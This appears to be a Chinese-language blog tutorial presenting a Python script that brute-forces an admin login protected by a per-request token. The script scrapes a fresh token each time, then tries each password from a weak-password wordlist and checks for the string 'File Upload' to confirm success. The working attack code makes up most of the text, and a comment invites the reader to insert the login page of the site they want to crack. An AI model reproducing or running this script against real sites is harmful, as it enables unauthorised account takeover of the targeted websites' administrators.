**用python编写脚本对有token防御的网站后台穷举密码*

原理：

1、首先获取session值

2、token值会写到服务器的文件中，且每次刷新一下，token值都会发生一次改变，文件中的token值也会发生改变

3、然后再提交账号和密码进行测试

python脚本：

import requests
import re

url = "···················"#填写你需要破解网站的登录页面，并确保你能访问和ping通

def login(password):
    session = requests.session()
    req=session.get(url)
    user_token=re.search("[a-z0-9]{32}",req.text).group(0) #32md5
    data={"username":"admin","password":password,"Login":"Login",'user_token':user_token}
    req=session.post(url=url,data=data,allow_redirects=True)
    html = req.text
    return html

with open('渗透测试弱密码.txt') as p:#密码本文件需要和python脚本在同一个文件夹中
    passlist =p.readlines()
    p.close()

for line in passlist:
    line = line.strip("\n")
    print(line)
    if 'File Upload' in login(line):
        print( "[* 密码 is %s *]" % line )
        break

常用密码：可在网站下载常用密码

密码本下载地址，可选择需要的下载